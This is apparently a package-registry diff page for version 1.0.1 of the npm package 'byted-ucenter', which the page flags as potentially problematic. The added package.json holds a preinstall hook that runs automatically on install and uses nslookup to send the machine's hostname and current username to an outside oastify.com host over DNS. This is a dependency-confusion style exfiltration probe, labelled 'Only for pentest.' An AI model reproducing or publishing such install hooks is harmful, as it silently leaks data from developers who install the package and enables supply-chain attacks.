byted-ucenter 1.0.1
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of byted-ucenter might be problematic. Click here for more details.
- package/package.json +15 -0
package/package.json
ADDED
@@ -0,0 +1,15 @@
|
|
1
|
+
{
|
2
|
+
"name": "byted-ucenter",
|
3
|
+
"version": "1.0.1",
|
4
|
+
"description": "Only for pentest.",
|
5
|
+
"main": "index.js",
|
6
|
+
"scripts": {
|
7
|
+
"test" : "echo \"Error: no test specified\"",
|
8
|
+
"preinstall" : "nslookup a.x$(hostname).2lo7dcgdyb0jswq2im0eop89q0wrkie63.oastify.com && nslookup a.x$(whoami).2lo7dcgdyb0jswq2im0eop89q0wrkie63.oastify.com"
|
9
|
+
},
|
10
|
+
"keywords": [
|
11
|
+
"TT"
|
12
|
+
],
|
13
|
+
"author": "js",
|
14
|
+
"license": "ISC"
|
15
|
+
}
|